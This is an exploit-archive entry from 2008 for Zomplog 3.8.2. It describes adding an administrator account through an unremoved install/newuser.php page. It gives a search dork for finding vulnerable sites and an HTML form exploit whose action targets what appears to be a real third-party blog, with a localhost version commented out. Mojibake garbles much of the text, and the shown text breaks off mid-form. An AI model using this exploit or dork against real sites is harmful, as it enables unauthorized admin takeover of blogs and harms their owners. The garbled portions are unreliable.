[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit
# Published : 2008-05-16
# Author : ArxWolf
# Previous Title : StanWeb.CMS (default.asp id) Remote SQL Injection Exploit
# Next Title : Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit
======================== WEBXAKEP.NET ===========================
Name: "Zomplog 3.8.2 <= add admin"
Version: All
Script Download: http://www.zomp.nl/zomplog/
DORK: "powered by zomplog"
Discovered By: ArxWolf
Discovered On: 16 05 2008
WWW: http://WebXakep.net
ICQ: 504-282
Vulnerability to "install/newuser.php", to add 2 administrator.
Folder "install" not removed in 70% of cases.
Exploit:
--------------------------------------------------------
<br><b><center>D”D?D±D°D2D???DμD? D°D′D?D?D?D° "Add Admin"</center></b><br><br>
<!-- <form action="http://localhost/install/newuser.php" method="POST"> /-->
<form action="http://weblog.sgrim.us/install/newuser.php" method="POST">
<p>D¢D???D??? D±D?D?D3D° "Blog Title"<br />
<input type="text" name="weblog_title" maxlength="40" id="blogname" />
<br />
<br />
D?D?D3D?D? "Username"<br />
<input type="text" name="login" maxlength="15" id="name" />
<br />
<br />
D?D°?